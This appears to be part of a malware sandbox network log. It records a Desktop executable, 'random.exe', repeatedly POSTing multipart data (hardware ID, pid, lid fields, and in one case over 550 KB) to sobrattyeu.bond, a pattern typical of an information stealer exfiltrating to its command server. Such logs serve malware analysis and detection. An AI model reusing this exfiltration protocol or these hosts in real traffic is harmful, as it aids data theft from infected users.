2025-01-14 10:18:03 UTC	1369	IN	Data Raw: 49 6a 73 43 71 35 50 54 69 77 59 48 49 43 54 56 4d 54 50 66 79 6b 68 76 71 7a 58 47 2b 57 35 45 7a 53 36 4a 33 69 56 4d 73 78 68 77 50 77 58 68 78 70 6e 43 51 56 55 70 4d 70 78 6b 64 66 44 42 62 33 4b 37 49 64 75 2b 64 67 7a 5a 5a 6f 50 58 5a 68 58 33 45 57 30 31 41 65 50 44 6e 49 30 4c 47 79 67 73 30 54 6b 36 33 64 39 4f 62 4b 30 34 77 76 56 37 51 73 30 69 69 4e 38 75 52 72 31 53 4c 48 77 4a 38 34 76 4c 77 6a 6f 59 49 53 72 66 4b 6e 58 49 67 31 38 69 70 7a 2b 4e 70 69 6c 4f 7a 69 61 4c 31 79 70 47 76 78 4e 75 4d 67 6e 75 77 70 75 4b 48 52 51 71 49 74 30 79 4f 74 62 4a 51 32 65 6b 4e 4d 6e 34 5a 67 4b 4f 5a 6f 50 44 5a 68 58 33 50 55 55 4a 54 4d 72 78 30 35 31 42 44 47 34 74 30 48 78 74 6c 38 46 46 62 71 67 38 79 2f 64 6c 53 4d 6b 74 69 4e 41 69 51 62 34 Data Ascii: IjsCq5PTiwYHICTVMTPfykhvqzXG+W5EzS6J3iVMsxhwPwXhxpnCQVUpMpxkdfDBb3K7Idu+dgzZZoPXZhX3EW01AePDnI0LGygs0Tk63d9ObK04wvV7Qs0iiN8uRr1SLHwJ84vLwjoYISrfKnXIg18ipz+NpilOziaL1ypGvxNuMgnuwpuKHRQqIt0yOtbJQ2ekNMn4ZgKOZoPDZhX3PUUJTMrx051BDG4t0Hxtl8FFbqg8y/dlSMktiNAiQb4
2025-01-14 10:18:03 UTC	900	IN	Data Raw: 2b 72 4e 67 59 55 47 42 79 41 6e 30 7a 51 39 33 73 78 43 5a 36 30 31 77 66 52 6f 52 63 34 6f 6a 4a 74 6f 44 62 41 4b 49 6d 52 4f 79 74 75 49 6b 42 6b 59 44 79 66 54 66 43 71 5a 31 41 5a 6c 72 48 4f 56 76 6d 42 51 78 43 75 57 30 69 46 44 75 42 46 77 50 51 50 67 32 5a 53 4e 43 78 49 69 4c 4e 4d 36 4e 4e 4c 48 53 6d 57 6c 4f 4d 4c 79 4b 51 79 41 49 5a 79 62 66 67 32 5a 47 58 45 72 44 65 58 41 68 5a 6c 50 43 6d 41 7a 6e 44 73 35 6c 35 55 47 59 61 73 34 79 66 35 6c 51 73 51 72 68 4d 6b 70 53 72 41 62 61 53 34 45 37 4d 79 59 69 67 51 61 4b 44 6a 51 4d 69 66 53 33 31 51 69 37 6e 50 4b 35 69 6b 61 67 42 43 44 79 7a 5a 4f 39 53 4e 30 50 78 6a 67 78 70 2f 43 45 46 73 33 61 74 73 77 64 59 2b 4e 51 47 32 70 4d 4d 4c 2f 59 45 37 4e 49 34 33 65 4a 30 75 7a 47 47 67 38 Data Ascii: +rNgYUGByAn0zQ93sxCZ601wfRoRc4ojJtoDbAKImROytuIkBkYDyfTfCqZ1AZlrHOVvmBQxCuW0iFDuBFwPQPg2ZSNCxIiLNM6NNLHSmWlOMLyKQyAIZybfg2ZGXErDeXAhZlPCmAznDs5l5UGYas4yf5lQsQrhMkpSrAbaS4E7MyYigQaKDjQMifS31Qi7nPK5ikagBCDyzZO9SN0Pxjgxp/CEFs3atswdY+NQG2pMML/YE7NI43eJ0uzGGg8
2025-01-14 10:18:03 UTC	1369	IN	Data Raw: 33 35 31 39 0d 0a 4e 6b 6f 4d 48 48 53 34 73 31 6a 67 32 33 73 35 42 61 36 59 34 7a 76 52 6d 52 63 59 69 68 4e 41 68 51 37 45 58 61 54 56 4f 70 59 75 55 6d 6b 39 4e 62 67 7a 2f 4c 69 66 6c 77 30 56 35 34 43 79 44 35 79 6c 46 7a 47 62 63 6d 79 31 46 75 41 42 6e 4e 51 62 76 77 70 4f 47 42 52 67 70 4b 74 6b 78 4d 4e 50 44 51 6d 57 67 50 38 4c 35 59 55 33 45 4a 6f 75 62 61 41 32 77 43 69 4a 6b 54 73 76 41 68 61 4d 42 48 6a 78 71 77 33 49 73 6c 38 70 4b 49 76 68 7a 77 2f 64 6f 53 73 34 71 6a 4e 38 30 54 62 77 62 62 54 30 42 36 38 69 53 69 41 63 48 4b 43 72 58 4e 44 4c 66 79 55 68 77 6f 54 79 4e 73 43 6c 46 32 47 62 63 6d 78 64 62 73 42 56 74 66 69 66 73 30 4a 4b 49 44 42 34 69 61 73 4e 79 4c 4a 66 4b 53 69 4c 34 63 38 44 79 5a 45 62 53 4b 6f 54 62 4c 30 71 39 Data Ascii: 3519NkoMHHS4s1jg23s5Ba6Y4zvRmRcYihNAhQ7EXaTVOpYuUmk9Nbgz/Liflw0V54CyD5ylFzGbcmy1FuABnNQbvwpOGBRgpKtkxMNPDQmWgP8L5YU3EJoubaA2wCiJkTsvAhaMBHjxqw3Isl8pKIvhzw/doSs4qjN80TbwbbT0B68iSiAcHKCrXNDLfyUhwoTyNsClF2GbcmxdbsBVtfifs0JKIDB4iasNyLJfKSiL4c8DyZEbSKoTbL0q9
2025-01-14 10:18:03 UTC	1369	IN	Data Raw: 76 71 78 35 6d 46 41 51 63 76 49 4e 41 39 4d 74 44 47 56 47 6d 79 4f 4d 58 39 5a 30 72 4a 4a 6f 72 62 4a 30 43 33 55 69 78 38 43 66 4f 4c 79 38 49 71 4e 6a 6b 38 31 6e 34 57 77 4e 74 4d 5a 61 77 6c 78 76 39 71 56 4d 30 32 78 4a 56 6d 58 4c 41 44 49 6d 51 59 2b 39 79 55 6e 55 45 4d 62 69 33 51 66 47 32 58 78 6b 6c 73 72 54 6a 4a 39 32 78 4b 77 79 4f 42 30 53 70 42 74 68 70 72 4e 67 76 75 7a 5a 6d 42 41 52 6f 76 4a 74 67 31 4f 39 36 4e 43 43 4b 6e 4b 34 32 6d 4b 58 54 51 49 5a 7a 57 4e 67 2b 46 45 58 4d 74 47 2b 62 62 6c 63 41 67 46 69 49 70 32 54 73 6c 6c 39 49 49 65 2b 41 30 77 62 34 78 41 73 41 69 69 4e 67 68 51 37 67 66 62 54 73 46 35 4d 47 64 6b 41 41 51 4a 69 62 55 4d 53 66 64 78 31 52 72 71 54 37 44 39 6e 74 42 67 47 6a 45 33 44 34 4e 37 31 4a 51 4e Data Ascii: vqx5mFAQcvINA9MtDGVGmyOMX9Z0rJJorbJ0C3Uix8CfOLy8IqNjk81n4WwNtMZawlxv9qVM02xJVmXLADImQY+9yUnUEMbi3QfG2XxklsrTjJ92xKwyOB0SpBthprNgvuzZmBARovJtg1O96NCCKnK42mKXTQIZzWNg+FEXMtG+bblcAgFiIp2Tsll9IIe+A0wb4xAsAiiNghQ7gfbTsF5MGdkAAQJibUMSfdx1RrqT7D9ntBgGjE3D4N71JQN
2025-01-14 10:18:03 UTC	1369	IN	Data Raw: 64 77 68 64 56 64 6d 72 70 50 7a 76 5a 79 6c 42 7a 37 52 4c 41 39 57 56 50 7a 79 33 45 6c 57 5a 4c 39 30 6f 79 63 6b 37 76 32 74 50 61 58 30 64 31 66 34 39 72 5a 59 58 53 43 48 76 67 4a 59 32 6d 4f 77 79 41 4e 4d 53 44 5a 67 71 30 41 48 41 36 44 66 33 49 31 4c 77 78 4e 6a 6b 38 31 69 64 33 38 63 70 58 61 37 59 2b 33 38 42 58 62 4d 30 6e 68 39 56 6b 66 4b 45 66 63 6a 38 4c 37 50 57 74 6a 41 67 42 4b 53 54 61 50 48 57 5a 6a 55 6b 69 2b 41 71 4e 74 69 6c 39 6a 6d 61 63 6d 33 34 4e 67 68 46 73 4d 67 6e 39 32 74 36 68 47 41 4d 6b 4d 5a 34 61 4d 73 62 45 55 47 2b 79 63 34 4f 2b 62 77 4b 59 64 73 71 62 49 6c 7a 33 53 6a 4a 75 56 62 36 59 78 4e 4a 64 43 6d 41 7a 6e 43 70 31 6a 35 38 49 49 72 4a 7a 6c 62 34 75 51 64 49 30 67 74 67 77 54 76 41 73 58 42 77 46 2f 63 Data Ascii: dwhdVdmrpPzvZylBz7RLA9WVPzy3ElWZL90oyck7v2tPaX0d1f49rZYXSCHvgJY2mOwyANMSDZgq0AHA6Df3I1LwxNjk81id38cpXa7Y+38BXbM0nh9VkfKEfcj8L7PWtjAgBKSTaPHWZjUki+AqNtil9jmacm34NghFsMgn92t6hGAMkMZ4aMsbEUG+yc4O+bwKYdsqbIlz3SjJuVb6YxNJdCmAznCp1j58IIrJzlb4uQdI0gtgwTvAsXBwF/c
2025-01-14 10:18:03 UTC	1369	IN	Data Raw: 54 6e 74 35 69 32 78 6e 79 49 4e 66 49 72 5a 7a 6c 61 77 6e 41 74 4a 6d 33 4a 74 68 54 71 55 41 5a 44 38 59 36 49 79 74 76 44 6f 57 49 43 54 62 4b 67 44 55 33 45 56 69 71 77 33 7a 33 32 64 4a 78 79 71 53 35 52 68 34 74 42 78 73 4f 78 6a 36 69 39 33 43 41 46 56 32 45 35 78 30 64 65 69 44 42 6e 72 67 61 34 33 4c 61 6b 7a 4f 49 5a 4c 4b 61 33 69 30 41 32 45 38 42 61 75 46 30 34 52 50 54 58 78 6b 6e 44 67 6b 6c 35 55 57 4d 50 74 6d 6e 71 6b 35 45 4e 39 6f 6e 5a 73 77 44 65 39 41 4c 48 77 63 71 35 50 54 78 51 77 48 50 43 7a 66 4b 6a 61 51 38 33 68 45 6f 7a 54 4c 2f 57 64 56 30 57 53 72 32 43 31 42 75 78 56 30 41 6a 44 2b 79 4a 32 4d 43 41 4d 2f 61 70 4a 38 4f 70 65 56 66 79 4b 78 4f 63 71 79 49 51 37 52 4e 59 72 51 4d 45 72 33 4c 53 78 38 46 71 75 54 30 37 63 Data Ascii: Tnt5i2xnyINfIrZzlawnAtJm3JthTqUAZD8Y6IytvDoWICTbKgDU3EViqw3z32dJxyqS5Rh4tBxsOxj6i93CAFV2E5x0deiDBnrga43LakzOIZLKa3i0A2E8BauF04RPTXxknDgkl5UWMPtmnqk5EN9onZswDe9ALHwcq5PTxQwHPCzfKjaQ83hEozTL/WdV0WSr2C1BuxV0AjD+yJ2MCAM/apJ8OpeVfyKxOcqyIQ7RNYrQMEr3LSx8FquT07c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49717	104.21.96.1	443	5332	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:18:04 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=M4E72L7WH20FB5R446 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12833 Host: sobrattyeu.bond
2025-01-14 10:18:04 UTC	12833	OUT	Data Raw: 2d 2d 4d 34 45 37 32 4c 37 57 48 32 30 46 42 35 52 34 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 45 35 37 45 42 37 30 44 46 31 44 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4d 34 45 37 32 4c 37 57 48 32 30 46 42 35 52 34 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 34 45 37 32 4c 37 57 48 32 30 46 42 35 52 34 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 39 32 35 0d 0a Data Ascii: --M4E72L7WH20FB5R446Content-Disposition: form-data; name="hwid"CF0E57EB70DF1D8FB960CC18D99B375A--M4E72L7WH20FB5R446Content-Disposition: form-data; name="pid"2--M4E72L7WH20FB5R446Content-Disposition: form-data; name="lid"7tx2jo--925
2025-01-14 10:18:05 UTC	1128	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:18:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1dd1bhj992n52lgombiun0rd45; expires=Sat, 10 May 2025 04:04:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfxM2NJYyIr%2FRJMCS27ux6UQZ%2B2NxcfeL0pQ10GaWF9Z8IKx8qMHOSBlWWCYK6AKaVBhvj64j%2Fm1poGp4A2e3TsZoh73t03ZmqjGjV7eUtmMTz%2FZIYIvI2NrZ5qKmwa8jlc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ce142d9ec72a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1906&min_rtt=1897&rtt_var=730&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13772&delivery_rate=1479229&cwnd=212&unsent_bytes=0&cid=0bffdf92bfad0228&ts=539&x=0"
2025-01-14 10:18:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 10:18:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49718	104.21.96.1	443	5332	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:18:05 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2WWHDW1P4QC3Z3XCCUZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15081 Host: sobrattyeu.bond
2025-01-14 10:18:05 UTC	15081	OUT	Data Raw: 2d 2d 32 57 57 48 44 57 31 50 34 51 43 33 5a 33 58 43 43 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 45 35 37 45 42 37 30 44 46 31 44 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 32 57 57 48 44 57 31 50 34 51 43 33 5a 33 58 43 43 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 57 57 48 44 57 31 50 34 51 43 33 5a 33 58 43 43 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 39 32 Data Ascii: --2WWHDW1P4QC3Z3XCCUZContent-Disposition: form-data; name="hwid"CF0E57EB70DF1D8FB960CC18D99B375A--2WWHDW1P4QC3Z3XCCUZContent-Disposition: form-data; name="pid"2--2WWHDW1P4QC3Z3XCCUZContent-Disposition: form-data; name="lid"7tx2jo--92
2025-01-14 10:18:06 UTC	1130	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:18:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dru3319evl6dq2t9mn94669110; expires=Sat, 10 May 2025 04:04:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yd0aG%2ByRA21vnC11inyBp81yzF1n8h56vZ74vFRzU4iHLzBGCwzg29u7OuxWgIyMyJBj1tGElLsInbBIWhVsyvQULOeXnYrz9ryY1%2B8w9JUD98zQ58Am1%2FVEYhx%2F7wj%2FNdM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ce1493cfa4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1536&rtt_var=593&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16021&delivery_rate=1818181&cwnd=240&unsent_bytes=0&cid=26da27094ab4d2b2&ts=562&x=0"
2025-01-14 10:18:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 10:18:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	104.21.96.1	443	5332	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:18:06 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4VUWPAQKW2VRGC8DB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20559 Host: sobrattyeu.bond
2025-01-14 10:18:06 UTC	15331	OUT	Data Raw: 2d 2d 34 56 55 57 50 41 51 4b 57 32 56 52 47 43 38 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 45 35 37 45 42 37 30 44 46 31 44 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 34 56 55 57 50 41 51 4b 57 32 56 52 47 43 38 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 56 55 57 50 41 51 4b 57 32 56 52 47 43 38 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 39 32 35 0d 0a 2d 2d 34 Data Ascii: --4VUWPAQKW2VRGC8DBContent-Disposition: form-data; name="hwid"CF0E57EB70DF1D8FB960CC18D99B375A--4VUWPAQKW2VRGC8DBContent-Disposition: form-data; name="pid"3--4VUWPAQKW2VRGC8DBContent-Disposition: form-data; name="lid"7tx2jo--925--4
2025-01-14 10:18:06 UTC	5228	OUT	Data Raw: 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
2025-01-14 10:18:07 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:18:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=psrer257prd4gre0h08pgh6mvm; expires=Sat, 10 May 2025 04:04:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V9Nv3pRN1Fsh%2BCgphPWXP5BWfZL0T8W9YMA28yjYg1gu1SS%2FU%2Bv5oDColS7oVVMxCejr4f7MH65b1%2Bty4DBT3B0F%2BEnFwQQfVUy%2FIZ521VBcPAQN27HucqXfM0v2D3qwgiU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ce1500e421a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1936&rtt_var=742&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21519&delivery_rate=1460000&cwnd=157&unsent_bytes=0&cid=9596f214df1ac117&ts=615&x=0"
2025-01-14 10:18:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 10:18:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	104.21.96.1	443	5332	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:18:07 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TT1M2YVI7I2DC5ULKYW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1408 Host: sobrattyeu.bond
2025-01-14 10:18:07 UTC	1408	OUT	Data Raw: 2d 2d 54 54 31 4d 32 59 56 49 37 49 32 44 43 35 55 4c 4b 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 45 35 37 45 42 37 30 44 46 31 44 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 54 54 31 4d 32 59 56 49 37 49 32 44 43 35 55 4c 4b 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 54 31 4d 32 59 56 49 37 49 32 44 43 35 55 4c 4b 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 39 32 Data Ascii: --TT1M2YVI7I2DC5ULKYWContent-Disposition: form-data; name="hwid"CF0E57EB70DF1D8FB960CC18D99B375A--TT1M2YVI7I2DC5ULKYWContent-Disposition: form-data; name="pid"1--TT1M2YVI7I2DC5ULKYWContent-Disposition: form-data; name="lid"7tx2jo--92
2025-01-14 10:18:08 UTC	1134	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:18:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ud1lnj5n6oj4ei1ii4c6ucmfn8; expires=Sat, 10 May 2025 04:04:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iOwnAAiXXoRVrOmmea5pdeFd7K9OxSkkRO%2B%2B%2FXQ73t%2FGc%2F8BB1ndd5oZz2OVbyGf24HEHXHmYAQC67tot%2Fj4VFPwkBSlld0Dc34m%2B5GHqbT1HDikX0ZXtJUc8pAIVMfbZ%2Fc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ce15759701a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1964&rtt_var=744&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2325&delivery_rate=1463659&cwnd=157&unsent_bytes=0&cid=fd4b548ed25324f2&ts=338&x=0"
2025-01-14 10:18:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 10:18:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49721	104.21.96.1	443	5332	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:18:08 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JJWRCLSW6E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551497 Host: sobrattyeu.bond
2025-01-14 10:18:08 UTC	15331	OUT	Data Raw: 2d 2d 4a 4a 57 52 43 4c 53 57 36 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 45 35 37 45 42 37 30 44 46 31 44 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4a 4a 57 52 43 4c 53 57 36 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 4a 57 52 43 4c 53 57 36 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 39 32 35 0d 0a 2d 2d 4a 4a 57 52 43 4c 53 57 36 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --JJWRCLSW6EContent-Disposition: form-data; name="hwid"CF0E57EB70DF1D8FB960CC18D99B375A--JJWRCLSW6EContent-Disposition: form-data; name="pid"1--JJWRCLSW6EContent-Disposition: form-data; name="lid"7tx2jo--925--JJWRCLSW6EContent-Di
